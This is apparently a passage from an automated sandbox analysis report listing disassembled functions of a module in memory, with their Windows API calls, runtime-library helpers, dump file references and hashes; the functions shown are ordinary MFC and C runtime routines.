                            • Part of subcall function 6FA75069: __CallSettingFrame@12.LIBCMT ref: 6FA750B5
                            • Part of subcall function 6FA7C53C: __getptd.LIBCMT ref: 6FA7C54B
                            • Part of subcall function 6FA7C53C: __getptd.LIBCMT ref: 6FA7C559
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          • Opcode ID: 7b1fc9a49dc1a69d5adc6d356d718ffc8851d93567fe25dba3563baaabcbfd19
                          • Instruction ID: 65036a99256ed2bda391dc5aed07d7e363d49f4fa2ea6a44d3320d021836e517
                          • Opcode Fuzzy Hash: 7b1fc9a49dc1a69d5adc6d356d718ffc8851d93567fe25dba3563baaabcbfd19
                          • Instruction Fuzzy Hash: EB11D7B5C04309EFDF10DFA4C944A9D7BB1FF14319F108169E814A72A0EB799A91DF90
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 6FA6DB6D
                          • GetDlgCtrlID.USER32(00000000), ref: 6FA6DB81
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FA6DB91
                          • GetWindowRect.USER32(00000000,?), ref: 6FA6DBA3
                          • PtInRect.USER32(?,?,?), ref: 6FA6DBB3
                          • GetWindow.USER32(?,00000005), ref: 6FA6DBC0
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientCtrlLongScreen
                          • String ID:
                          • API String ID: 1315500227-0
                          • Opcode ID: 0dcac91e0aff8a7fa64a9764126029cbbd53c6bf63411c1ad43a2a0c81c39106
                          • Instruction ID: df5c96968743dc6b0495cbfea9be10a4259dc45d98e61b997d0fc5bf287c06f2
                          • Opcode Fuzzy Hash: 0dcac91e0aff8a7fa64a9764126029cbbd53c6bf63411c1ad43a2a0c81c39106
                          • Instruction Fuzzy Hash: 7101A272104619BBCF015B55CC08E9E3B6DFF4B7A0F188121F921E6184DB78E562CB94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: _memset
                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                          • API String ID: 2102423945-1093365818
                          • Opcode ID: 42c2f4ce413a8d9d2a322ec09a5bfdffdd2c03398b2dc01ad1b9a446f347318e
                          • Instruction ID: 1ad81d1012890bd9bbb85148bfd839e80d2a576ce16125a92527faf9b71186b8
                          • Opcode Fuzzy Hash: 42c2f4ce413a8d9d2a322ec09a5bfdffdd2c03398b2dc01ad1b9a446f347318e
                          • Instruction Fuzzy Hash: B2912475D0030DAEDB60CFA4C585FDEBBF8AF44344F149166E918E6181EB7896C4CBA4
                          APIs
                          • GetMenuCheckMarkDimensions.USER32 ref: 6FA696F2
                          • _memset.LIBCMT ref: 6FA6976A
                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FA697CD
                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FA697E5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                          • String ID:
                          • API String ID: 4271682439-3916222277
                          • Opcode ID: 9ce4f4873e471a3cbca310e5d7f44db774d0e9c82abd085fd8403bb189552fff
                          • Instruction ID: 69fc6fc6424665b2b5e2de4e6a4a6aaf11d62a4f706ce1a6afa8c256fe6330aa
                          • Opcode Fuzzy Hash: 9ce4f4873e471a3cbca310e5d7f44db774d0e9c82abd085fd8403bb189552fff
                          • Instruction Fuzzy Hash: C9313572A003249FEF208F288DC4B997BB8FB49350F4980B6E548DB2C1DF7599868F50
                          APIs
                          • __getptd.LIBCMT ref: 6FA7C17F
                            • Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
                            • Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F
                          • __getptd.LIBCMT ref: 6FA7C190
                          • __getptd.LIBCMT ref: 6FA7C19E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$csm
                          • API String ID: 803148776-1389381023
                          • Opcode ID: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
                          • Instruction ID: 6dd39e4d2081363402f83b810db3fefd5f93b98b1bc6e1a08897b3c76df1016f
                          • Opcode Fuzzy Hash: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
                          • Instruction Fuzzy Hash: F6E04F7A5182049FDB209BB4C145F5937A5EF69718F1901A1D50CCB272DF3DE5C0D982
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,6FA649D6,?,00000003), ref: 6FA65685
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FA656B4
                          • GetLastError.KERNEL32 ref: 6FA656C5
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FA656E5
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FA65709
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                          • String ID:
                          • API String ID: 3322701435-0
                          • Opcode ID: bca4763de0306d5aad11eb91d1286bc5ff7db5b58cd5a3a7ae80b8ea5c64642d
                          • Instruction ID: 7b0a48164c55cb64f54311e00449a4e766fe0b7dee90446e632f3d7c69449923
                          • Opcode Fuzzy Hash: bca4763de0306d5aad11eb91d1286bc5ff7db5b58cd5a3a7ae80b8ea5c64642d
                          • Instruction Fuzzy Hash: A4119D75384305AFE6209F68CC80F6777A8EB89714F100D28B65196281EAA4BC498760
                          APIs
                          • lstrlenW.KERNEL32(?,?,?), ref: 6FA6DA3D
                          • _memset.LIBCMT ref: 6FA6DA5B
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FA6DA75
                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FA6DA87
                          • SetWindowTextW.USER32(00000000,?), ref: 6FA6DA93
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                          • String ID:
                          • API String ID: 4273134663-0
                          • Opcode ID: aa112234f792f27814b14ff911b52b6eea54cfbe71ed1e36bd38c72cce701f6c
                          • Instruction ID: 163ca9aafe710dc2f1b8d978754783fd54903d43b97ef667acf060728439a7be
                          • Opcode Fuzzy Hash: aa112234f792f27814b14ff911b52b6eea54cfbe71ed1e36bd38c72cce701f6c
                          • Instruction Fuzzy Hash: 6201C4BA518719ABCB00EB648D88DDF77ADEF45350F148061E915D7241EE38D945C7A0
                          APIs
                          • __getptd.LIBCMT ref: 6FA7FE1A
                            • Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
                            • Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F
                          • __amsg_exit.LIBCMT ref: 6FA7FE3A
                          • __lock.LIBCMT ref: 6FA7FE4A
                          • InterlockedDecrement.KERNEL32(?), ref: 6FA7FE67
                          • InterlockedIncrement.KERNEL32(02B128C0), ref: 6FA7FE92
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          • Opcode ID: 00e962186b445bfa1a3a8b9d3d2eefbc8aef20195914667f4075a5cfff2eff64
                          • Instruction ID: 74ad2734740596f856e04f7aff9a453f5aa4082722fa629b6e2c33a83739b396
                          • Opcode Fuzzy Hash: 00e962186b445bfa1a3a8b9d3d2eefbc8aef20195914667f4075a5cfff2eff64
                          • Instruction Fuzzy Hash: 3B015E3AA01B219BDA319B698904F5E77E1AF85724F04411DE81067291CF2CBAD2CBD5
                          APIs
                          • TlsFree.KERNEL32(?,?,?,6FA6C179), ref: 6FA6C13B
                          • GlobalHandle.KERNEL32(?), ref: 6FA6C149
                          • GlobalUnlock.KERNEL32(00000000), ref: 6FA6C152
                          • GlobalFree.KERNEL32(00000000), ref: 6FA6C159
                          • DeleteCriticalSection.KERNEL32(?,?,?,6FA6C179), ref: 6FA6C163
                            • Part of subcall function 6FA6BF5D: EnterCriticalSection.KERNEL32(?), ref: 6FA6BFBC
                            • Part of subcall function 6FA6BF5D: LeaveCriticalSection.KERNEL32(?), ref: 6FA6BFCC
                            • Part of subcall function 6FA6BF5D: LocalFree.KERNEL32(?), ref: 6FA6BFD5
                            • Part of subcall function 6FA6BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FA6BFE7
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                          • String ID:
                          • API String ID: 1549993015-0
                          • Opcode ID: f42b937f1979750bb637fdf3206afeb275910034afc528d9f2f6babeee2dc7c3
                          • Instruction ID: 7b55099819db833d7fdfe9e06f1dc17597766565e3a62fb844614f6195659cf1
                          • Opcode Fuzzy Hash: f42b937f1979750bb637fdf3206afeb275910034afc528d9f2f6babeee2dc7c3
                          • Instruction Fuzzy Hash: DAF05E36204B009BDE109B389C48E5A3BB9AF87A717594609F539D7394DF78E8538770
                          APIs
                            • Part of subcall function 6FA6C220: EnterCriticalSection.KERNEL32(6FA934A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C25A
                            • Part of subcall function 6FA6C220: InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C26C
                            • Part of subcall function 6FA6C220: LeaveCriticalSection.KERNEL32(6FA934A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C279
                            • Part of subcall function 6FA6C220: EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C289
                            • Part of subcall function 6FA6BB0C: __EH_prolog3_catch.LIBCMT ref: 6FA6BB13
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FA71458
                          • FreeLibrary.KERNEL32(?), ref: 6FA71468
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                          • String ID: HtmlHelpW$hhctrl.ocx
                          • API String ID: 2853499158-3773518134
                          • Opcode ID: ad2b3ad36c21dd8f8c82fb00b464eb56df170e66856fd1dfb3760079f2d4c72d
                          • Instruction ID: 19873c64a7ee4812b4c6899dbe2ce9c8a3033dbad06fa4cc12fa42b6c754eb62
                          • Opcode Fuzzy Hash: ad2b3ad36c21dd8f8c82fb00b464eb56df170e66856fd1dfb3760079f2d4c72d
                          • Instruction Fuzzy Hash: 4701FD71100B06ABCB211BB6CE14F5A3BE4AF04769F00C424F86AA9190CF7CE0D08B11
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 6FA7C7D6
                            • Part of subcall function 6FA7C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FA7C767
                          • _UnwindNestedFrames.LIBCMT ref: 6FA7C7ED
                          • ___FrameUnwindToState.LIBCMT ref: 6FA7C7FB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                          • String ID: csm
                          • API String ID: 2163707966-1018135373
                          • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                          • Instruction ID: 915c48793b8c54c35fefb6533b0f6e7fa43831be68c0a21aee169542e260c9d3
                          • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                          • Instruction Fuzzy Hash: 4201E43A000209BBDF225E51CE84EEA7F6AFF18358F144011BD1865160DF3AE9B1EBA1
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,6FA777D7), ref: 6FA7ED7C
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FA7ED8C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          • Opcode ID: 5e830134cf1f00d7a61ea8ce3c2507d209441ca420953d861f2cf5c88e29514c
                          • Instruction ID: 0512204adb69e970d8f58a721625c36d1c4f85975e190e2b0da659fca896d571
                          • Opcode Fuzzy Hash: 5e830134cf1f00d7a61ea8ce3c2507d209441ca420953d861f2cf5c88e29514c
                          • Instruction Fuzzy Hash: CAF09034A04A09E2DF002BB1ED4D6AF7F7AFF82342F820880E1A1A01C4DF7484F1D245
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: File$SizeTime_memset
                          • String ID:
                          • API String ID: 151880914-0
                          • Opcode ID: 2215a2ab9e7a80f9e7167f4a9ffc76ca5cd58d2427686d38d91a97db9d344b7f
                          • Instruction ID: 0817eb1c2e7d385efd88ebc6587ceb989b1f439a1e21a12f784af8c3a6b13a24
                          • Opcode Fuzzy Hash: 2215a2ab9e7a80f9e7167f4a9ffc76ca5cd58d2427686d38d91a97db9d344b7f
                          • Instruction Fuzzy Hash: F7510D715147059FD720CF68C940D9AB7F8FF09320B148A1EE4A6D7690EB38F985CB60
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FA8084F
                          • __isleadbyte_l.LIBCMT ref: 6FA80883
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FA740D8,6FA8BF84,00000000,00000000,?,?,?,?,6FA740D8,00000000,?), ref: 6FA808B4
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FA740D8,00000001,00000000,00000000,?,?,?,?,6FA740D8,00000000,?), ref: 6FA80922
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: ca665d4fb6ca39404b43f979776bda1aa7f611317e633a7d7525dcad0a653ea1
                          • Instruction ID: 99cb6a3309cf2e2cd485d319a0fefbebaac8a879cc8b14053231b2508ce34312
                          • Opcode Fuzzy Hash: ca665d4fb6ca39404b43f979776bda1aa7f611317e633a7d7525dcad0a653ea1
                          • Instruction Fuzzy Hash: BF31A231906285EFEB10DFA4C8849AE3BB5BF01310F19D5AAE4749B191D7B4F9C1DB90
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6FA68ED0
                            • Part of subcall function 6FA69C7C: __EH_prolog3.LIBCMT ref: 6FA69C83
                          • __wcsdup.LIBCMT ref: 6FA68EF2
                          • GetCurrentThread.KERNEL32 ref: 6FA68F1F
                          • GetCurrentThreadId.KERNEL32 ref: 6FA68F28
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CurrentH_prolog3Thread$__wcsdup
                          • String ID:
                          • API String ID: 190065205-0
                          • Opcode ID: 07c02b32910fbb1dd75a96d57c6d7eff0eaa0e1e98981e64cb6bae07b3a8dfb1
                          • Instruction ID: c2b96b5118595d9f3974e9fa5f33917eb0b4565d40157ceb7e1603287badf6ea
                          • Opcode Fuzzy Hash: 07c02b32910fbb1dd75a96d57c6d7eff0eaa0e1e98981e64cb6bae07b3a8dfb1
                          • Instruction Fuzzy Hash: F2216BB0944B508FC7219F7A824464AFBF8BFA5704F10891FD1AAC7B61DBB8A481CF55
                          APIs
                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA71D33
                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA71D5E
                          • GetCapture.USER32 ref: 6FA71D70
                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FA71D7F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: MessageSend$Capture
                          • String ID:
                          • API String ID: 1665607226-0
                          • Opcode ID: 084d3fc5ef797b98fe2c721ccc43854937dd98f380b3e330c239d7675a8d37f5
                          • Instruction ID: 839c33558fa919550c1da5f7806a81cc1ac56ac4cb9e2f52c6584f444e76caaa
                          • Opcode Fuzzy Hash: 084d3fc5ef797b98fe2c721ccc43854937dd98f380b3e330c239d7675a8d37f5
                          • Instruction Fuzzy Hash: 3E011A753547947BDF301B628CCDFEB3E7ADBCAB10F150079B6159A1E6CEA58880DA20
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6FA66A8A
                            • Part of subcall function 6FA668E2: _malloc.LIBCMT ref: 6FA66900
